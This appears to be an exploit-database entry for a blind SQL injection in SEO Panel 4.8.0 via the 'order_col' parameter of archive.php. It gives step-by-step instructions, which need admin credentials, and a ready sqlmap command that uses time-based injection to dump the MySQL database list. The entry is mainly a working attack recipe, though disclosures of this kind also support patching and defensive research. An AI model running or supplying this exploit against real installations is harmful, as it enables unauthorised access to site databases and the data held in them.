SEO Panel 4.8.0 SQL Injection

2021.03.18
Credit: Piyush Patil
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection # Date: 17/02/2021 # Exploit Author: Piyush Patil # Vendor Homepage: https://www.seopanel.org/ # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0 # Version: 4.8.0 # Reference - https://github.com/seopanel/Seo-Panel/issues/209 Step 1 - Login to the SEO Panel with admin credentials. Step 2 - Go to archive.php Step 3 - Change "order_col" value to "*" and copy the request Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL --dbs --technique=T --flush-session


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top